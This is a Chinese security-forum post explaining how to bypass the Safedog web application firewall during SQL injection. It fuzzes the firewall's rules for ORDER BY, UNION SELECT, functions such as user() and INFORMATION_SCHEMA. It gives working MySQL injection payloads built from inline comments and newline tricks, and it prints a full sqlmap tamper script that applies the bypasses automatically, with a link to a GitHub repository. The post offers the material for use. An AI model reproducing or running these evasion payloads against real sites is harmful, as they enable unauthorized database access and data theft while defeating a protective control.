安全矩阵

 找回密码
 立即注册
搜索
查看: 2725|回复: 0

干货|SQL注入bypass最新版安全狗

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-11-19 10:03:30 | 显示全部楼层 |阅读模式
原文链接:干货|SQL注入bypass最新版安全狗
0x00:前言

安全狗又偷偷摸摸更新了
0x01:绕过之前安全狗就像没开发完一样,简单内联就过去了,但是现在的安全狗摇身一变,变得稳重了起来。
就连报错界面都变成了大人的模样。

看这架势,不好过啊

首先 and 内敛注释依旧是可以过的,看来安全狗并没有太过关注and,可能是觉得后面的规则比较牛,知道有注入也没用?

然后是order by ,从这里开始,事情就变得微妙了起来

猜测规则是order by 组合强规则,意思就是order by中间无论加什么都过不去
随便试一试

果然,但是有没有发现,我fuzz的符号里没有加#号,因为加了就会这样

由于锚点这个特殊性,盲猜这是一个突破点
可能安全狗遇到注释也会直接截断掉后面的语句(类似某锁),那就好说了,构造个注释在语句前面即可

居然没过,小看你了安全狗,看来order by规则还没失效,那么 尝试隔断order by
中间加个%0a

轻轻松松
接下来是union select 组合
同理,也可以这样过


1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,2,3 --+


下一个是user()这类函数,这里也是个坑,发现直接括号会被拦



去一个右括号就没事了,这规则也是无语


既然如此,在括号里下文章即可
依然是换行加注释绕过

-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +


然后是INFORMATION_SCHEMA 这玩意,居然也被加到了规则里,


更多技术文章请关注公众号:HACK之道



-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,(select %0a group_concat(s

chema_name %0a /*80000aaa*/) %0a from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.schemata*/),3-- +



0x02:tamper
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-



  3. """
  4. Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26)
  5. See the file 'LICENSE' for copying permission
  6. Author:pureqh.top
  7. """

  8. import re
  9. import os

  10. from lib.core.data import kb
  11. from lib.core.enums import PRIORITY
  12. from lib.core.common import singleTimeWarnMessage
  13. from lib.core.enums import DBMS
  14. __priority__ = PRIORITY.LOW

  15. def dependencies():
  16.     singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

  17. def tamper(payload, **kwargs):

  18.         payload=payload.replace(" ","  ",1)
  19.         payload=payload.replace("ORDER BY","REGEXP "[...%25%23]"   /*!11444order %0a by*/")
  20.         payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/")
  21.         payload=payload.replace(" AND","/*!11444AND*/")
  22.         payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE")
  23.         payload=payload.replace("UNION SELECT","/*!11444union*/  /*REGEXP "[...%25%23]"*/  %0a select /*REGEXP "[...%25%23]"*/")
  24.         payload=payload.replace("UNION ALL SELECT","REGEXP "[...%0a%23]" /*!11444union %0a select */ ")
  25.         payload=payload.replace("()","(%0a /*!80000aaa*/)")
  26.         payload=payload.replace(" AS","/*!11444AS*/")
  27.         payload=payload.replace("FROM","/*!11444FROM*/")
  28.         payload=payload.replace("INFORMATION_SCHEMA","/*like"%0a%23"*/ %0a  INFORMATION_SCHEMA")
  29.         payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/")

  30.         return payload
复制代码


题外话 某锁也能这样过
代码已更新至github
https://github.com/pureqh/bypasswaf


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 03:39 , Processed in 0.015143 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表